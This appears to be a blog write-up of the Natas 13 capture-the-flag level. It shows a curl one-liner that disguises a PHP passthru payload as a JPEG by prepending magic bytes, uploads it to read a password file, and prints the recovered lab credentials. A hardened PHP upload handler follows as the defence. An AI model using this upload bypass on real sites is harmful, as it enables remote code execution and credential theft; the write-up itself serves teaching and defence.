Sunday 5 October 2014

Wargames - Natas 13


Recommended reading:
From the credentials discovered from the previous challenge, head up to http://natas13.natas.labs.overthewire.org and take a look at its content.
This challenge is exactly the same as the previous one: the service doesn't change, it's still a simple form to upload an image, so I'm not going into more detail about it; you can look it up in the previous challenge. In fact, we'll just look at the source code that differs between the previous challenge and this one, which is these two lines:
} else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) {
    echo "File is not an image";
If you check the full source code, these are lines 48 and 49, where the server validates the POST request. If you look at the exif_imagetype function, all it does is read the first bytes of the file and check its signature. At this point you should have some idea of what we have to do to bypass this: we need to provide a file with a valid signature in those first bytes. Looking at this website, we know that .jpg images always start with 0xFF 0xD8 0xFF 0xE8, so all we need is to prepend those 4 bytes to what we're sending. We'll take the command from the previous challenge, make some minor modifications so it fits our needs, and this is what it looks like:
echo "\xFF\xD8\xFF\xE8 <?php passthru('cat /etc/natas_webpass/natas14'); ?>" | curl http://natas13:jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY@natas13.natas.labs.overthewire.org/ --form "uploadedfile=@-" --form "filename=exploit.php"
We just added the signature bytes at the beginning, plus a space, so we can separate the bytes from the password. After running this command we'll be given a URL to the uploaded file, just like before, and if we fetch that URL this is what we get:
ÿØÿà Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1
Like before, a single line with the password for natas14.

User natas14
Password Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1

Not a very effective method of preventing malicious code from being uploaded, as we could overcome it so simply.
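For comparison, here is what a server-side check that actually holds up looks like. This is an added example, not the Natas 13 source: it keeps the exif_imagetype call from the challenge to show exactly where it falls short (PHP identifies a JPEG from the first three bytes FF D8 FF alone; the fourth byte is only the marker of the first segment, E0 for JFIF or E1 for Exif, which is why the fetched file above renders as ÿØÿà), then fully decodes and re-encodes the image with GD so that whatever the client appended after the signature never reaches disk, and stores it under a server-chosen name with a fixed extension. The form field name "uploadedfile" is taken from the challenge; the upload directory /var/uploads is an assumed path outside the web root, and the GD extension is assumed to be installed.

```php
<?php
// Added example of a hardened upload handler (not the Natas source).
// Assumes: field name "uploadedfile" as in the challenge, GD available,
// and $uploadDir pointing outside the web root (assumed path below).

function validate_and_store_upload(array $file, string $uploadDir): string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Upload failed');
    }
    if ($file['size'] > 1024 * 1024) {
        throw new RuntimeException('File too large');
    }

    // 1. Signature check. This is all the challenge does: exif_imagetype()
    //    reads only the leading bytes, so a text file that starts with
    //    "\xFF\xD8\xFF" is accepted as a JPEG.
    $type = exif_imagetype($file['tmp_name']);
    if ($type !== IMAGETYPE_JPEG && $type !== IMAGETYPE_PNG) {
        throw new RuntimeException('File is not an image');
    }

    // 2. Full decode. GD parses the whole stream; a file with a signature
    //    but no frame data behind it fails here instead of being stored.
    $img = ($type === IMAGETYPE_JPEG)
        ? @imagecreatefromjpeg($file['tmp_name'])
        : @imagecreatefrompng($file['tmp_name']);
    if ($img === false) {
        throw new RuntimeException('File is not a valid image');
    }

    // 3. Re-encode under a server-chosen name. The bytes written come from
    //    GD, not from the client, so trailing data or text hidden in a
    //    comment segment is dropped, and the client-supplied "filename"
    //    field is never consulted for the extension.
    $ext  = ($type === IMAGETYPE_JPEG) ? '.jpg' : '.png';
    $name = bin2hex(random_bytes(16)) . $ext;
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    $ok   = ($type === IMAGETYPE_JPEG) ? imagejpeg($img, $dest, 90) : imagepng($img, $dest);
    imagedestroy($img);
    if (!$ok) {
        throw new RuntimeException('Could not store image');
    }
    return $name;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['uploadedfile'])) {
    try {
        // '/var/uploads' is an assumed directory outside the document root.
        $stored = validate_and_store_upload($_FILES['uploadedfile'], '/var/uploads');
        echo 'Stored as ' . htmlspecialchars($stored);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage());
    }
}
```

The decode step is what rejects the signature-only trick from this challenge; the re-encode and the fixed extension are what matter against a genuine image that also happens to contain script text, since the web server is never handed a client-controlled .php name and the stored bytes are no longer the client's. Keeping the directory outside the web root means that even a mistake in the naming logic does not turn an upload into executable code.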

Never Settle,

